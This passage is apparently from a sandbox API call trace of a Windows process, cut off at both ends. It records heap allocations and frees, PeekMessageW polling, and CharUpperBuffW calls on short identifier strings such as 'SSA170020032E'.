(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a00 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b8) returned 0x2a970b8 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b8) returned 0x2a9d878 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a970b8 | out: hHeap=0x2af0000) returned 1 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0087.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0087.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0087.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.194] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.195] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.195] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.195] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.195] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0087.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d70 [0087.195] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0087.196] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.196] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.196] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0087.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0087.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d60 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9da8 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dc0 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0087.199] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d70 | out: hHeap=0x2af0000) returned 1 [0087.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.199] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.200] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0087.200] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.200] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 